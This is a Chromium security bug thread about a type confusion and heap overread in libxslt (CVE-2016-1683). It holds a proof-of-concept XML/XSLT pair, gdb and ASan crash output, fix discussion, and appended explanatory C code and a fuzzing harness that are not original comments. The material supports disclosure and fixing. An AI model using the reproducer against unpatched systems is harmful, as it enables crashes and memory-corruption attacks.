Issue 583156 Security: Type confusion and UAF in libxslt
Starred by 2 users Reported by nicolas....@agarri.fr, Feb 2 2016 Back to list
Status: Fixed
Owner:
Closed: Apr 2016
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

VULNERABILITY DETAILS

Apparent type confusion in libxslt, leading to heap UAF
I don't understand what is really going on...

VERSION

Chrome Version: release+asan+symbolized v371829
Operating System: Ubuntu x64

REPRODUCTION CASE

Live PoC: http://nicob.net/chrome-Ezeil0hi/Bug-1/NumberFormatGetMultipleLevel.xml

# XML

<?xml-stylesheet type="text/xsl" href="NumberFormatGetMultipleLevel.xsl"?>
<top xmlns:a="AAAA" xmlns:b="BBBB" xmlns:c="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC">
<foo/>
<bar/>
</top>

# XSLT

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
 <xsl:template match="*/*">
  <xsl:for-each select="namespace::*">
   <xsl:number/>
  </xsl:for-each>
 </xsl:template>
</xsl:stylesheet>

ADDITIONAL INFORMATION

Chrome stack-trace is attached. The following GDB session (using CLI xsltproc) shows the type confusion in effect:

(gdb) b xsltNumberFormatGetMultipleLevel
(gdb) r
(gdb) c
(gdb) p *node
$2 = {
  _private = 0x60180000b440,
  type = XML_NAMESPACE_DECL,
  name = 0x600800009310 'C' <repeats 39 times>,
  children = 0x60040000c390,
  last = 0x0,
  parent = 0x0,
  next = 0x2ffffff00000002,
  prev = 0xb00000100000025,
  doc = 0x772f2f3a70747468,
  ns = 0x726f2e33772e7777,
  content = 0x39312f4c4d582f67 <error: Cannot access memory at address 0x39312f4c4d582f67>,
  properties = 0x73656d616e2f3839,
  nsDef = 0x65636170,
  psvi = 0x0,
  line = 2,
  extra = 0
}
(gdb) c
(gdb) p *node
$3 = {
  _private = 0x60180000b440,
  type = XML_NAMESPACE_DECL,
  name = 0x60040000c370 "BBBB",
  children = 0x60040000c350,
  last = 0x0,
  parent = 0x0,
  next = 0x2ffffff00000002,
  prev = 0xb00000100000028,
  doc = 0x4343434343434343,
  ns = 0x4343434343434343,
  content = 0x4343434343434343 <error: Cannot access memory at address 0x4343434343434343>,
  properties = 0x4343434343434343,
  nsDef = 0x43434343434343,
  psvi = 0x0,
  line = 2,
  extra = 0
}
(gdb) c
(gdb) c
==3024== ERROR: AddressSanitizer: heap-use-after-free on address 0x600800009198 at pc 0x7ffff4bf4be2 bp 0x7fffffff7550 sp 0x7fffffff7548
READ of size 8 at 0x600800009198 thread T0
    #0 0x7ffff4bf4be1 in xsltNumberFormatGetMultipleLevel /home/x/libxslt-1.1.28/libxslt/numbers.c:662
    #1 0x7ffff4bf69d7 in xsltNumberFormat /home/x/libxslt-1.1.28/libxslt/numbers.c:794
    #2 0x7ffff4c0e04f in xsltNumber /home/x/libxslt-1.1.28/libxslt/transform.c:4599
    #3 0x7ffff4c0eaa3 in xsltApplySequenceConstructor /home/x/libxslt-1.1.28/libxslt/transform.c:2647
    #4 0x7ffff4c129ac in xsltForEach /home/x/libxslt-1.1.28/libxslt/transform.c:5738
 
Attachment: xsltNumberFormatGetMultipleLevel-UAF.txt (24.0 KB)
Project Member Comment 1 by clusterf...@chromium.org, Feb 2 2016
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5309201817010176
Project Member Comment 2 by clusterf...@chromium.org, Feb 2 2016
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=6712313094078464
Cc: aizatsky@chromium.org scottmg@chromium.org mbarbe...@chromium.org och...@chromium.org dominicc@chromium.org infe...@chromium.org kcc@chromium.org
Labels: Cr-Blink-XML Security_Severity-Medium M-49 Pri-1 Security_Impact-Stable OS-All reward-topanel
Owner: fmalita@chromium.org
Status: Assigned
fmalita@, I saw that you did some fixes related to libxslt previously. Could you please take a look here or suggest any other owner?
Cc: -scottmg@chromium.org fmalita@chromium.org
Owner: scottmg@chromium.org
If I touched libxslt it must have been long ago, as I have no recollection :)

Reassigning to listed libxslt owner for triage.
Maybe veillard@gmail.com (libxslt author) should be cc'ed...
Comment 6 by och...@chromium.org, Feb 23 2016
Ping. Any updates here? Note that the crash in #c1 did reproduce on CF, but wasn't marked as "Reproducible" because of the flakiness and as a result it did not get added as a comment here.
Comment 7 by mmoroz@google.com, Mar 3 2016
Cc: ddkil...@apple.com
Cc: scottmg@chromium.org
Owner: dominicc@chromium.org
Comment 9 by ddkil...@apple.com, Mar 5 2016
This reproduces on upstream trunk libxslt (fc1ff481fd01e9a65a921c542fed68d8c965e8a3).

This bug was reported nearly 50 days ago... Why not add the libxslt maintainer to the thread (cf. comment 5)?
Cc: veill...@gmail.com
CC'ing veillard@gmail.com upon request from the reporter.
Cc: wellnho...@aevum.de
+wellnhofer@aevum.de, another libxslt maintainer
Fixed with the following commit:

https://git.gnome.org/browse/libxslt/commit/?id=d182d8f6ba3071503d96ce17395c9d55871f0242

The root cause of this bug is a terrible hack in libxml2's XPath engine: namespace nodes are actually an xmlNs, not an xmlNode. This resulted in an out-of-bounds heap access (not a UAF). A machine word beyond the end of the xmlNs struct was compared with itself which seems relatively harmless.

But I wouldn't be surprised if similar issues turn up with namespace nodes. If anyone is fuzzing libxslt, it's a good idea to work with XPath expressions like "namespace::*".
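Added illustration (not libxml2, libxslt or Chromium code) of the confusion the root-cause comment above describes and the gdb dump in the report shows: for "namespace::*" the XPath engine hands out an xmlNs typed as xmlNodePtr, so every xmlNode field at an offset of sizeof(xmlNs) or beyond (next, prev, doc, ns, content, ...) is read from whatever follows the 48-byte (x86-64) allocation. That is why the dump's doc/ns/content/properties/nsDef words decode to the ASCII of neighbouring strings ("http://www.w3.org/XML/1998/namespace" in the first dump, the run of 'C' from the xmlns:c URI in the second) while _private holds the owning element and parent is NULL. The struct mirrors of xmlNs and xmlNode are copied from the public libxml2 layout only so this builds without libxml2 installed; the in-memory tree and the namespace copy are constructed, and safe_parent shows the kind of type check required, not the actual fix in the linked commit.

```c
/*
 * Added illustration for this bug (not libxml2 or libxslt code): why an XPath
 * namespace node must not be read through xmlNode fields.
 *
 * The two structs mirror the public layouts from libxml2's <libxml/tree.h>;
 * they are repeated here only so the example builds without libxml2. Real
 * code includes the header instead of redefining them.
 */
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

typedef unsigned char xmlChar;
typedef enum {
    XML_ELEMENT_NODE = 1,
    XML_DOCUMENT_NODE = 9,
    XML_NAMESPACE_DECL = 18
} xmlElementType;
typedef xmlElementType xmlNsType;

typedef struct _xmlNs {
    struct _xmlNs  *next;      /* XPath copies store the owning element here */
    xmlNsType       type;      /* always XML_NAMESPACE_DECL */
    const xmlChar  *href;
    const xmlChar  *prefix;
    void           *_private;
    struct _xmlDoc *context;
} xmlNs, *xmlNsPtr;

typedef struct _xmlNode {
    void             *_private;   /* aliases xmlNs.next  */
    xmlElementType    type;       /* aliases xmlNs.type  */
    const xmlChar    *name;       /* aliases xmlNs.href  */
    struct _xmlNode  *children;   /* aliases xmlNs.prefix */
    struct _xmlNode  *last;       /* aliases xmlNs._private */
    struct _xmlNode  *parent;     /* aliases xmlNs.context (NULL for XPath copies) */
    struct _xmlNode  *next;       /* first field past the end of an xmlNs */
    struct _xmlNode  *prev;
    struct _xmlDoc   *doc;
    xmlNs            *ns;
    xmlChar          *content;
    struct _xmlAttr  *properties;
    xmlNs            *nsDef;
    void             *psvi;
    unsigned short    line;
    unsigned short    extra;
} xmlNode, *xmlNodePtr;

/* True if reading this xmlNode field through a pointer that really points
 * at an xmlNs reads past the xmlNs allocation (the overread in numbers.c). */
int xmlnode_field_overruns_ns(size_t field_offset, size_t field_size)
{
    return field_offset + field_size > sizeof(xmlNs);
}

/* Mimics what libxml2's XPath engine does for "namespace::*": a fresh xmlNs
 * whose next pointer is the element the namespace is in scope on, returned
 * inside a nodeset typed as xmlNodePtr. Constructed, no parser involved. */
xmlNodePtr make_xpath_ns_copy(xmlNodePtr owner, const char *href, const char *prefix)
{
    xmlNsPtr ns = calloc(1, sizeof(*ns));   /* only sizeof(xmlNs) bytes */
    if (ns == NULL) return NULL;
    ns->type = XML_NAMESPACE_DECL;
    ns->href = (const xmlChar *) href;
    ns->prefix = (const xmlChar *) prefix;
    ns->next = (xmlNsPtr) owner;
    return (xmlNodePtr) ns;
}

/* Parent step that checks the type tag before touching anything else.
 * For a namespace node even the in-bounds parent field is wrong (it is the
 * NULL context pointer); the owner lives in xmlNs.next. */
xmlNodePtr safe_parent(xmlNodePtr node)
{
    if (node == NULL) return NULL;
    if (node->type == XML_NAMESPACE_DECL)
        return (xmlNodePtr) ((xmlNsPtr) node)->next;
    return node->parent;
}

/* ancestor-or-self walk in the spirit of xsltNumberFormatGetMultipleLevel:
 * stop at the document node, count element ancestors. */
int count_element_ancestors(xmlNodePtr start)
{
    int n = 0;
    for (xmlNodePtr cur = start; cur != NULL && cur->type != XML_DOCUMENT_NODE; cur = safe_parent(cur))
        if (cur->type == XML_ELEMENT_NODE) n++;
    return n;
}

/* Constructed tree <top><foo xmlns:b="BBBB"/></top>; counts the element
 * ancestors of foo's namespace node as xsl:number inside
 * for-each select="namespace::*" would. Returns 2 (foo and top). */
int demo_ancestor_count(void)
{
    xmlNode doc = {0}, top = {0}, foo = {0};
    doc.type = XML_DOCUMENT_NODE;
    top.type = XML_ELEMENT_NODE; top.parent = &doc;
    foo.type = XML_ELEMENT_NODE; foo.parent = &top;
    xmlNodePtr ns = make_xpath_ns_copy(&foo, "BBBB", "b");
    int n = count_element_ancestors(ns);
    free(ns);
    return n;
}

int main(void)
{
    printf("sizeof(xmlNs)=%zu sizeof(xmlNode)=%zu\n", sizeof(xmlNs), sizeof(xmlNode));
    printf("xmlNode.parent overruns xmlNs: %d\n",
           xmlnode_field_overruns_ns(offsetof(xmlNode, parent), sizeof(void *)));
    printf("xmlNode.next   overruns xmlNs: %d\n",
           xmlnode_field_overruns_ns(offsetof(xmlNode, next), sizeof(void *)));
    printf("element ancestors of namespace node: %d\n", demo_ancestor_count());
    return 0;
}
```

The check to carry into any code that walks XPath results is the one in safe_parent: test node->type before reading any other xmlNode member, and treat XML_NAMESPACE_DECL as an xmlNs whose owner is in next. The same rule applies to every other axis step in libxslt that receives nodes from a nodeset, which is what the warning about "namespace::*" in the comment above is pointing at.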
@wellnhofer: Thanks for the quick fix!
Status: Started
Brief update: I'm working on rolling this here:

https://codereview.chromium.org/1848793005

Should happen on Monday.
Up for review here: https://codereview.chromium.org/1853083002
Project Member Comment 17 by bugdroid1@chromium.org, Apr 6 2016
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab

commit 96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab
Author: dominicc <dominicc@chromium.org>
Date: Wed Apr 06 00:16:28 2016

Roll libxslt to 891681e3e948f31732229f53cb6db7215f740fc7

BUG= 583156 , 583171 

Review URL: https://codereview.chromium.org/1853083002

Cr-Commit-Position: refs/heads/master@{#385338}

[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/COPYING
[delete] https://crrev.com/5d32c4d7ac9cd3e4a45a5cc1fc547103b66816c7/third_party/libxslt/ChangeLog
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/HACKING
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/MAINTAINERS
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/Makefile.in
[delete] https://crrev.com/5d32c4d7ac9cd3e4a45a5cc1fc547103b66816c7/third_party/libxslt/NEWS
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/NOTES
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/README.chromium
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/README.cvs-commits
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/aclocal.m4
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/compile
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/config.guess
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/config.sub
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/configure
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/configure.in
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/depcomp
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/install-sh
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libexslt/Makefile.in
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libexslt/crypto.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libexslt/date.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libexslt/functions.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libexslt/strings.c
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt.doap
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/Makefile.in
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/attributes.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/extensions.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/functions.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/imports.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/keys.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/libxslt.h
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/namespaces.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/numbers.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/pattern.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/preproc.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/transform.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/variables.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/win32config.h
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/xslt.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/xsltInternals.h
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/xsltconfig.h
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/xsltconfig.h.in
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/xsltutils.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/xsltutils.h
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/linux/COPYING
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/linux/Makefile
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/linux/config.h
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/linux/config.log
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/linux/libexslt.pc
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/linux/libexslt/Makefile
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/linux/libexslt/exsltconfig.h
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/linux/libxslt.pc
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/linux/libxslt.spec
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/linux/libxslt/Makefile
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/linux/libxslt/xsltwin32config.h
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/linux/stamp-h1
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/ltmain.sh
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/mac/config.h
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/missing
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/win32/Makefile.msvc
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/win32/config.h
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/win32/runtests.py
[delete] https://crrev.com/5d32c4d7ac9cd3e4a45a5cc1fc547103b66816c7/third_party/libxslt/xslt-config.in
[delete] https://crrev.com/5d32c4d7ac9cd3e4a45a5cc1fc547103b66816c7/third_party/libxslt/xsltproc/Makefile.am
[delete] https://crrev.com/5d32c4d7ac9cd3e4a45a5cc1fc547103b66816c7/third_party/libxslt/xsltproc/testThreads.c
[delete] https://crrev.com/5d32c4d7ac9cd3e4a45a5cc1fc547103b66816c7/third_party/libxslt/xsltproc/xsltproc.c

Status: Fixed
Project Member Comment 19 by clusterf...@chromium.org, Apr 6 2016
Labels: -Restrict-View-SecurityTeam Merge-Triage M-51 M-50 Restrict-View-SecurityNotify
Adding Merge-Triage label for tracking purposes.

Once your fix had sufficient bake time (on canary, dev as appropriate), please nominate your fix for merge by adding the Merge-Requested label.

When your merge is approved by the release manager, please start merging with higher milestone label first. Make sure to re-request merge for every milestone in the label list. You can get branch information on omahaproxy.appspot.com.

Your fix is very close to the branch point. After the branch happens, please make sure to check if your fix is in.

- Your friendly ClusterFuzz
Labels: -Merge-Triage Merge-Requested
Hmm, clusterfuzz y u no verify this?
Project Member Comment 21 by sheriffbot@chromium.org, Apr 14 2016
Labels: -M-49
Comment 22 by tin...@google.com, Apr 21 2016
Merge-Requested label isn't a valid merge request, pls either clean it up or use a valid label. Thanks.
Cc: tinazh@chromium.org
Labels: -Merge-Requested
@tinazh, see Comment 19. Clusterfuzz is telling people to add this label.
Labels: Merge-Request-51
#23: The change from "Merge-Requested" to "Merge-Request-XX" (where XX is the Chrome milestone) is in progress.
Comment 25 by tin...@google.com, May 9 2016
Labels: -Merge-Request-51 Merge-Review-51 Hotlist-Merge-Review
[Automated comment] Commit may have occurred before M51 branch point (4/8/2016), needs manual review.
Labels: -Hotlist-Merge-review -Merge-Review-51 merge-na Release-0-M51
...and it's already in M51. Updating labels.
Comment 27 Deleted
Labels: -CVE-2016-1684 CVE-2016-1683
Thanks for reporting this issue. Our reward panel decided to award you $1,000 for this report. Congratulations!

We've credited you in our release notes as "Nicolas Gregoire": https://googlechromereleases.blogspot.com/2016/05/stable-channel-update_25.html - if you'd like to use a different name, please let me know.

Someone from our finance team will be in contact to collect details for payment within 7 days. If that doesn't happen, please either update this bug or contact me at timwillis@.

The CVE-ID for this issue is CVE-2016-1683. Usual boilerplate text below - let me know if you have any questions.

Thanks again for the report!


*** Boilerplate reminders! ***
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an established charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.
Comment 29 by kcc@chromium.org, May 26 2016
Is it possible to fuzz libxslt with libFuzzer? 
https://chromium.googlesource.com/chromium/src/+/master/testing/libfuzzer/README.md
Comment 30 by ddkil...@apple.com, May 26 2016
> Is it possible to fuzz libxslt with libFuzzer? 

There are certainly APIs that libxslt exposes that could be used to fuzz libxslt.  The biggest challenge may be managing two separate corpora for one task:  an XML document corpus and an XSLT document corpus.  I suppose one could also do something where one document type is held fixed (XML), and the other one is managed as a corpus (XSLT), but you'd want to use more than a single XML document to fuzz over a period of time.

Comment 31 by kcc@chromium.org, May 26 2016
I would handle it this way: treat the input byte array as a pair of xml+xslt separated by some 8-byte magic delimiter. If the delimiter is not present (killed by mutations) the input will be rejected right away.
A minor challenge will be to prepare a rich initial input corpus for such a target; after that fuzzing should be smooth.
I don't have enough xslt knowledge to create such target code, anyone?
I tried this. Fuzzer never discovers any valid XSLT even with valid corpus. The xslt format is too brittle and demanding (it has to be valid xml and valid xslt).

The other problem (yet potential) is that xslt processing doesn't have to be linear.
Comment 33 by kcc@chromium.org, May 26 2016
I did not say it's simple. We'll likely need a dictionary for xslt and a very good seed corpus.
Comment 34 by ddkil...@apple.com, May 27 2016
You could start the corpus with built-in (non-error) tests for libxslt.  (Are there any other XSL[T] test suites available as open source or otherwise freely distributed?)

At Google, maybe you could find example URLs (via the search engine index) that return application/xml (or text/xml) content with associated stylesheets, and use that.  For example, here's a web page from OpenGL.org that might serve as an example:  <https://www.opengl.org/sdk/docs/man2/xhtml/gluPerspective.xml>

Nick Wellnhofer has been fuzzing (or knows someone who has been fuzzing) using AFL and ASan as he's been fixing libxslt bugs found by fuzzing.  Maybe there is some information he can share?

Yes, I've been fuzzing libxslt but it's still a work in progress. I can share some ideas on the libxslt mailing list. This private bug report is not the right forum.
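Added example (not Chromium's, libxslt's or any commenter's code) of the input layout proposed in comment 31 and the seed-corpus packing that comments 33 and 34 call for: one byte array holding the XML document, an 8-byte delimiter, then the stylesheet, rejected before any parsing when the delimiter is gone. The delimiter value "[[XSLT]]", the file names passed to xmlReadMemory and the XML_PARSE_NONET option are assumptions. The libFuzzer entry point needs libxml2/libxslt and is compiled only under XSLT_FUZZ_WITH_LIBXSLT; the splitter, the packer and the round-trip check build and run stand-alone. The ownership handling assumes xsltParseStylesheetDoc takes over the stylesheet document only on success.

```c
/*
 * Added example (not Chromium's or libxslt's fuzzer): the "xml + delimiter +
 * xslt" input layout from comment 31, plus a packer for seed inputs.
 * Delimiter value, file names and parser options are assumptions.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define XSLT_FUZZ_DELIM     "[[XSLT]]"   /* assumed 8-byte magic */
#define XSLT_FUZZ_DELIM_LEN 8

typedef struct {
    const uint8_t *xml;  size_t xml_len;
    const uint8_t *xslt; size_t xslt_len;
} xslt_fuzz_pair;

/* Finds the first delimiter; returns 1 and fills out on success, 0 if the
 * delimiter is missing (a mutation destroyed it) so the target bails out. */
int split_fuzz_input(const uint8_t *data, size_t size, xslt_fuzz_pair *out)
{
    if (data == NULL || size < XSLT_FUZZ_DELIM_LEN) return 0;
    for (size_t i = 0; i + XSLT_FUZZ_DELIM_LEN <= size; i++) {
        if (memcmp(data + i, XSLT_FUZZ_DELIM, XSLT_FUZZ_DELIM_LEN) == 0) {
            out->xml = data;
            out->xml_len = i;
            out->xslt = data + i + XSLT_FUZZ_DELIM_LEN;
            out->xslt_len = size - i - XSLT_FUZZ_DELIM_LEN;
            return 1;
        }
    }
    return 0;
}

/* Seed-corpus helper: packs an XML/XSLT pair into the fuzz layout. Returns
 * the number of bytes written, or 0 if the buffer is too small. */
size_t pack_seed_input(const char *xml, const char *xslt, uint8_t *out, size_t cap)
{
    size_t xl = strlen(xml), sl = strlen(xslt);
    size_t total = xl + XSLT_FUZZ_DELIM_LEN + sl;
    if (total > cap) return 0;
    memcpy(out, xml, xl);
    memcpy(out + xl, XSLT_FUZZ_DELIM, XSLT_FUZZ_DELIM_LEN);
    memcpy(out + xl + XSLT_FUZZ_DELIM_LEN, xslt, sl);
    return total;
}

/* Stand-alone check: packs a constructed copy of this report's PoC pair and
 * splits it again; returns 1 when both halves come back byte for byte. */
int demo_roundtrip(void)
{
    const char *xml = "<top xmlns:a=\"AAAA\" xmlns:b=\"BBBB\"><foo/><bar/></top>";
    const char *xsl = "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">"
                      "<xsl:template match=\"*/*\"><xsl:for-each select=\"namespace::*\"><xsl:number/>"
                      "</xsl:for-each></xsl:template></xsl:stylesheet>";
    uint8_t buf[512];
    xslt_fuzz_pair p;
    size_t n = pack_seed_input(xml, xsl, buf, sizeof buf);
    if (n == 0 || !split_fuzz_input(buf, n, &p)) return 0;
    return p.xml_len == strlen(xml) && p.xslt_len == strlen(xsl)
        && memcmp(p.xml, xml, p.xml_len) == 0 && memcmp(p.xslt, xsl, p.xslt_len) == 0;
}

#ifdef XSLT_FUZZ_WITH_LIBXSLT
/* libFuzzer entry point, built only against libxml2/libxslt. */
#include <libxml/parser.h>
#include <libxslt/xslt.h>
#include <libxslt/transform.h>
#include <libxslt/xsltutils.h>

int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size)
{
    xslt_fuzz_pair p;
    if (!split_fuzz_input(data, size, &p)) return 0;   /* delimiter gone: reject */

    xmlDocPtr xml = xmlReadMemory((const char *) p.xml, (int) p.xml_len, "input.xml", NULL, XML_PARSE_NONET);
    xmlDocPtr sty = xmlReadMemory((const char *) p.xslt, (int) p.xslt_len, "input.xsl", NULL, XML_PARSE_NONET);
    if (xml != NULL && sty != NULL) {
        xsltStylesheetPtr sheet = xsltParseStylesheetDoc(sty);  /* owns sty on success */
        if (sheet != NULL) {
            sty = NULL;
            xmlDocPtr res = xsltApplyStylesheet(sheet, xml, NULL);
            if (res != NULL) xmlFreeDoc(res);
            xsltFreeStylesheet(sheet);
        }
    }
    if (sty != NULL) xmlFreeDoc(sty);
    if (xml != NULL) xmlFreeDoc(xml);
    return 0;
}
#endif

int main(void)
{
    printf("pack/split round trip ok: %d\n", demo_roundtrip());
    return 0;
}
```

Seeds are produced by running pack_seed_input over existing XML/XSLT pairs (libxslt's own test suite, as comment 34 suggests) and writing each result to one corpus file; with the delimiter fixed, a libFuzzer dictionary of XSLT element and attribute names gives the mutator the tokens comment 33 says it will need. A typical build is clang -g -O1 -fsanitize=fuzzer,address -DXSLT_FUZZ_WITH_LIBXSLT $(xslt-config --cflags --libs) fuzz_xslt.c.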
Labels: reward-inprocess
Labels: -reward-unpaid
Project Member Comment 38 by sheriffbot@chromium.org, Jul 13 2016
Labels: -Restrict-View-SecurityNotify
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 39 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 40 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic